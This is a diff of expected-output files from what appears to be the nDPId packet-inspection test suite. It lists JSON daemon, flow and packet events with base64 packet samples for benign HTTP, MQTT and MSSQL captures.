00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mpeg.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1434379491040}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434379491040,"flow_last_seen":1434379491040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434379491040,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434379491040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434379491040,"pkt":"yGyHABajPBXCt3IOCABFAABAOE9AAEAGJUTAqFCgLmWdd9n8AFBP68YoAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKFSiGAAAAAAAEAgAA"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1434379491117,"pkt":"PBXCt3IOyGyHABajCABFAAA8AABAADIGa5cuZZ13wKhQoABQ2fyPIjpcT+vGKaAScSAIFwAAAgQFqAQCCAoAu5vaFSiGAAEDAwhf8g=="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1434379491117,"pkt":"yGyHABajPBXCt3IOCABFAAA02wVAAEAGgpnAqFCgLmWdd9n8AFBP68YpjyI6XYAQECCXiwAAAQEIChUohk0Au5va"}
00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1434379491040,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1434379491117,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Network"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":0,"content_type":"","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}}
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1434379491040,"flow_last_seen":1434379491158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1434379491158,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":200,"content_type":"audio\/mpeg","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}}
00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1434379491040,"flow_last_seen":1434379491221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":9363,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1434379491221,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434379491040,"flow_last_seen":1434379491040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434379491040,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434379491040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434379491040,"pkt":"yGyHABajPBXCt3IOCABFAABAOE9AAEAGJUTAqFCgLmWdd9n8AFBP68YoAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKFSiGAAAAAAAEAgAA"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434379491117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1434379491117,"pkt":"PBXCt3IOyGyHABajCABFAAA8AABAADIGa5cuZZ13wKhQoABQ2fyPIjpcT+vGKaAScSAIFwAAAgQFqAQCCAoAu5vaFSiGAAEDAwhf8g=="}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434379491117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1434379491117,"pkt":"yGyHABajPBXCt3IOCABFAAA02wVAAEAGgpnAqFCgLmWdd9n8AFBP68YpjyI6XYAQECCXiwAAAQEIChUohk0Au5va"}
00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1434379491040,"flow_last_seen":1434379491117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1434379491117,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Network"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":0,"content_type":"","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}}
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1434379491040,"flow_last_seen":1434379491158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1434379491158,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":200,"content_type":"audio\/mpeg","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}}
00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1434379491040,"flow_last_seen":1434379491221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":9363,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1434379491221,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"}}
00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":19,"total-skipped-flows":0,"total-l4-data-len":9363,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1434379491221}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 19/19

20
test/results/mqtt.pcap.out
View File

@@ -1,15 +1,15 @@
00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mqtt.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643014009283}
00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014009283,"flow_last_seen":1643014009283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643014009283,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643014009283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643014009283,"pkt":"AAAAAAAAAAwATSywCABFAAA8AABAADQGcggKCgoBwKgAAQdbo6QZpJjZwwPwU6AS\/oijvAAAAgQFtAQCCArcK3DSu1+3wwEDAwc="}
00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643014009286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643014009286,"pkt":"AAAAAAAAAAwATSywCABFAAB2fFxAAD8G6nHAqAABCgoKAaOkB1vDA\/BTGaSY2oAYAOXxcQAAAQEICrtfuBTcK3DSEEAABk1RSXNkcAPCABQAFmNiYWFiY2JhYmFjYmJiYmJhYWFhYWIADDAyRDUwNTAyMjNEMwAMMDJENTA1MDIyM0Qz"}
00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643014009283,"flow_last_seen":1643014009286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1643014009286,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643014009367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1643014009367,"pkt":"AAAAAAAAAAwATSywCABFAABUfF1AAD8G6pLAqAABCgoKAaOkB1vDA\/CVGaSY2oAYAOUsbgAAAQEICrtfuGXcK3Ejgh4AAQAZYXN0ci9zNzIwLzAyRDUwNTAyMjNEMy85OQA="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":355,"pkt_l4_len":317,"thread_ts_msec":1643014349216,"pkt":"AAAAAAAAAAIAAAAIgQAD8AgARQABUdTzQABABowKZEMj7jOJHO+I2wdbWSC31VrTd7uAGAGz9SgAAAEBCAoAXWNEhxKKyRCaAgAETVFUVATAAlgAEFA0Nzc3NUlEMTcwVzIxMjAASmlvdGF6ZXdwbWxpdGh1Yi5henVyZS1kZXZpY2VzLm5ldC9QNDc3NzVJRDE3MFcyMTIwLz9hcGktdmVyc2lvbj0yMDE4LTA2LTMwALBTaGFyZWRBY2Nlc3NTaWduYXR1cmUgc2lnPUtVNFVpQlRmV2UlMkZ4cyUyQmdURzVXUURMdnpyUHg0VTYySFRwU2xma2Z4cmZRJTNEJnNlPTE2NDMwMTc5NDcmc3I9aW90YXpld3BtbGl0aHViLmF6dXJlLWRldmljZXMubmV0JTJGUDQ3Nzc1SUQxNzBXMjEyMCUyRiUzRmFwaS12ZXJzaW9uJTNEMjAxOC0wNi0zMA=="}
00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1643014009283,"flow_last_seen":1643014010972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014009283,"flow_last_seen":1643014009283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643014009283,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643014009283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643014009283,"pkt":"AAAAAAAAAAwATSywCABFAAA8AABAADQGcggKCgoBwKgAAQdbo6QZpJjZwwPwU6AS\/oijvAAAAgQFtAQCCArcK3DSu1+3wwEDAwc="}
00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643014009286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643014009286,"pkt":"AAAAAAAAAAwATSywCABFAAB2fFxAAD8G6nHAqAABCgoKAaOkB1vDA\/BTGaSY2oAYAOXxcQAAAQEICrtfuBTcK3DSEEAABk1RSXNkcAPCABQAFmNiYWFiY2JhYmFjYmJiYmJhYWFhYWIADDAyRDUwNTAyMjNEMwAMMDJENTA1MDIyM0Qz"}
00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643014009283,"flow_last_seen":1643014009286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1643014009286,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643014009367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1643014009367,"pkt":"AAAAAAAAAAwATSywCABFAABUfF1AAD8G6pLAqAABCgoKAaOkB1vDA\/CVGaSY2oAYAOUsbgAAAQEICrtfuGXcK3Ejgh4AAQAZYXN0ci9zNzIwLzAyRDUwNTAyMjNEMy85OQA="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643014349216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":355,"pkt_l4_len":317,"thread_ts_msec":1643014349216,"pkt":"AAAAAAAAAAIAAAAIgQAD8AgARQABUdTzQABABowKZEMj7jOJHO+I2wdbWSC31VrTd7uAGAGz9SgAAAEBCAoAXWNEhxKKyRCaAgAETVFUVATAAlgAEFA0Nzc3NUlEMTcwVzIxMjAASmlvdGF6ZXdwbWxpdGh1Yi5henVyZS1kZXZpY2VzLm5ldC9QNDc3NzVJRDE3MFcyMTIwLz9hcGktdmVyc2lvbj0yMDE4LTA2LTMwALBTaGFyZWRBY2Nlc3NTaWduYXR1cmUgc2lnPUtVNFVpQlRmV2UlMkZ4cyUyQmdURzVXUURMdnpyUHg0VTYySFRwU2xma2Z4cmZRJTNEJnNlPTE2NDMwMTc5NDcmc3I9aW90YXpld3BtbGl0aHViLmF6dXJlLWRldmljZXMubmV0JTJGUDQ3Nzc1SUQxNzBXMjEyMCUyRiUzRmFwaS12ZXJzaW9uJTNEMjAxOC0wNi0zMA=="}
00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1643014009283,"flow_last_seen":1643014010972,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00546{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-data-len":875,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1643014349216}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 9/9

110
test/results/mssql_tds.pcap.out
View File

@@ -1,62 +1,62 @@
00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mssql_tds.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1240877917888}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
